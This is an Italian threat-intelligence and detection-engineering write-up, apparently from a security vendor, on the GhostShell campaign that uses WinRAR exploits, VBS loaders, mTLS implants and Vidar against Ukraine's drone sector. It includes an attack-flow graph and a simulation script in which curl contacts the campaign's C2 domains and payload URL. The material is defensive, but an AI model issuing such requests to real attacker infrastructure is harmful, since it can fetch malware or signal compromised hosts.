GhostShell (MB-0009): Miratare le Operazioni UAV dell’Ucraina e la Catena di Approvvigionamento della Difesa
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Un nuovo cluster di minacce, conosciuto come GhostShell, sta prendendo di mira l’ecosistema ucraino di UAV e droni. L’operazione utilizza malware avanzato, inclusi impianti autenticati da mTLS e caricamenti basati sulla memoria. Per ottenere l’accesso iniziale, gli attaccanti si affidano a documenti esca che impersonano una società ucraina di droni.
Indagine
L’analista ha scoperto una catena di intrusioni a più stadi basata su script VBS, impianti abilitati mTLS come 122.exe, e caricamenti basati su Telegram inclusi update.exe. L’ingegneria inversa ha rivelato logica di decrittazione XOR personalizzata, una PKI privata incorporata, e l’uso di Xray Core per il tunneling nascosto. L’indagine ha anche identificato l’attività di Vidar infostealer all’interno della stessa infrastruttura.
Mitigazione
Le organizzazioni dovrebbero rinforzare la validazione rigida dei certificati mTLS e monitorare l’uso non autorizzato dei certificati client. La visibilità degli endpoint dovrebbe essere migliorata per rilevare il caricamento in memoria, ntdll.dll intromissioni, e cambiamenti sospetti alla persistenza della chiave di esecuzione di Windows Run. Le squadre dovrebbero anche monitorare il traffico in uscita anomalo verso domini di comando e controllo conosciuti e il recupero della configurazione guidata da Telegram.
Risposta
I sistemi colpiti dovrebbero essere isolati immediatamente, seguiti da analisi forensi della memoria per identificare eventuali impianti in memoria. I registri di rete dovrebbero essere esaminati per il traffico che coinvolge cloudaxis.cc and cdnexpress.cc. I team di sicurezza dovrebbero anche cercare gli hash SHA-256 di riferimento e monitorare il certificato client mTLS specifico CN=ed6e62814295701f.
"graph TB %% Class Definitions Section classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef network fill:#ffff99 classDef operator fill:#ff9900 %% Initial Access and Execution Phase action_phishing["<b>Azione</b> – <b>T1566.001 Phishing: Allegato Spearphishing</b><br/>Descrizione: Ingegneria sociale usando documenti PDF esca<br/>che impersonano Besomar per attaccare l’ecosistema UAV."] class action_phishing action action_exploit["<b>Azione</b> – <b>T1203 Sfruttamento per Esecuzione Client</b><br/>Descrizione: Sfruttando CVE-2025-8088 e CVE-2025-6218<br/>tramite archivio malevolo Besomar_documentation.rar."] class action_exploit action process_vbs["<b>Processo</b> – <b>T1059.005 Interprete di Comandi e Script: Visual Basic</b><br/>Descrizione: File VBS inserito nella cartella di avvio di Windows<br/>eseguendo stringhe codificate Base64 tramite ExecuteGlobal."] class process_vbs process %% Persistence and Payload Download action_persistence_startup["<b>Azione</b> – <b>T1547.001 Esecuzione Autostart all’Avvio o al Logon: Chiavi di Registro di Esecuzione / Cartella di Avvio</b><br/>Descrizione: File VBS inserito nella cartella di avvio per la persistenza."] class action_persistence_startup action network_download["<b>Rete</b> – <b>T1105 Trasferimento di Strumenti in Ingresso</b><br/>Descrizione: Scaricamento di payload secondari da cloudaxis.cc."] class network_download network op_branch(("E")) class op_branch operator %% Path 1: 122.exe malware_122["<b/>Nome: 122.exe<br/>Descrizione: Loader che decrittografa un PE incorporato usando XOR<br/>e lo esegue in memoria."] class malware_122 malware action_fingerprint["<b/>Azione: Fingerprinting Host<br/>Descrizione: Raccolta di nome del computer, nome utente, e PID."] class action_fingerprint action network_c2_122["<b/>Comunicazione C2: cdnexpress.cc<br/>Descrizione: Usa un certificato client mTLS unico per l’autenticazione."] class network_c2_122 network action_screen_cap["<b/>Azione: Cattura Schermo<br/>Descrizione: Cattura schermi tramite GDI+."] class action_screen_cap action action_persistence_reg["<b/>Azione: Chiavi di Registro Run<br/>Descrizione: Instaurare persistenza tramite chiavi di Registro di Windows Run."] class action_persistence_reg action %% Path 2: update.exe malware_update["<b/>Nome: update.exe<br/>Descrizione: Loader in memoria che recupera configurazione C2 da Telegram."] class malware_update malware action_anti_analysis["<b/>Azione: <b>T1562.001 Attenuare Difese: Disabilitare o Modificare Strumenti</b><br/>Descrizione: Scollegamento strumenti EDR / monitoraggio modificando ntdll.dll."] class action_anti_analysis action action_metasploit_stager["<b/>Azione: <b>T1059.003 Interprete di Comandi e Script: Shell dei Comandi di Windows</b><br/>Descrizione: Esegue un stager HTTPS in memoria in stile Metasploit."] class action_metasploit_stager action %% Path 3: 22.exe and Vidar malware_22["<b/>Nome: 22.exe<br/>Descrizione: Launcher a più stadi che utilizza il client Xray Core."] class malware_22 malware network_vless["<b/>Rete: <b>T1573 Canale Criptato</b><br/>Descrizione: Traffico di tunneling tramite connessione VLESS."] class network_vless network malware_vidar["<b/>Nome: Vidar Malware<br/>Descrizione: Strumento di furto delle credenziali e dei dati che prende di mira password del browser<br/>cookie, portafogli e artefatti di messaggistica."] class malware_vidar malware %% Connection Logic action_phishing –>|porta_a| action_exploit action_exploit –>|risultati_in| process_vbs process_vbs –>|usa| action_persistence_startup action_persistence_startup –>|attiva| network_download network_download –>|consegna| op_branch %% Branching to payloads op_branch –>|payload_1| malware_122 op_branch –>|payload_2| malware_update op_branch –>|payload_3| malware_22 %% 122.exe flow malware_122 –>|compie| action_fingerprint malware_122 –>|comunica_con| network_c2_122 malware_122 –>|capace_di| action_screen_cap malware_122 –>|assicura| action_persistence_reg %% update.exe flow malware_update –>|recupera_config_da| action_anti_analysis action_anti_analysis –>|esegue| action_metasploit_stager %% 22.exe flow malware_22 –>|tunneling_via| network_vless network_vless –>|distribuisce| malware_vidar "
Flusso di Attacco
Rilevamenti
Nome File Breve (via cmdline)
Visualizza
LOLBAS WScript / CScript (via process_creation)
Visualizza
Uso Sospetto di CURL (via cmdline)
Visualizza
Binari/Scripts Sospetti in Posizione di Autostart (via file_event)
Visualizza
Possibile Abuso di Telegram Come Canale di Comando e Controllo (via dns_query)
Visualizza
Possibile Tentativo di Sfruttamento CVE-2025-8088 / CVE-2025-6218 (Vulnerabilità WinRAR) (via file_event)
Visualizza
Comando e Controllo Sospetti tramite Richiesta DNS da Dominio di Livello Superiore Insolito (TLD) (via dns)
Visualizza
Rileva Comunicazione e Download di Payload dall’Infrastruttura GhostShell [Connessione di Rete Windows]
Visualizza
Persistenza del Malware GhostShell tramite la Cartella di Avvio [Evento File Windows]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Check Pre-volo di Telemetria & Baseline deve essere passato.
Razionale: Questa sezione descrive l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrazione & Comandi di Attacco: L’avversario ha ottenuto un primo punto d’appoggio e sta tentando di scaricare un payload specializzato (
122.exe) per stabilire un controllo solido sul target. Per mantenere un basso profilo, il malware utilizza un dominio CDN dirottato o che sembra legittimo (cloudaxis.cc). Dopo il download, il malware tenta di “vibrare” o inviare telemetria al C2 tramite un endpoint di analisi specifico (cdnexpress.cc/analytics). La simulazione utilizzeràcurlper imitare queste richieste GET specifiche per attivare la logica di rilevamento basata su URI. -
Script di Test di Regressione:
# Simulazione del Download del Payload GhostShell Write-Host "[+] Simulazione del download del payload GhostShell..." curl.exe -I "https://cloudaxis.cc/gsmft/yueu/fkvqld/tvqqwh/ushu/122.exe" # Simulazione della Comunicazione C2 di GhostShell (Analytics) Write-Host "[+] Simulazione della comunicazione C2 di GhostShell..." curl.exe -I "https://cdnexpress.cc/analytics" -
Comandi di Pulizia:
# Nessun file è effettivamente scaricato in questa simulazione (usando -I solo per intestazioni) # Nessuna modifica permanente è fatta al sistema. Write-Host "[+] Simulazione completata. Nessuna pulizia richiesta."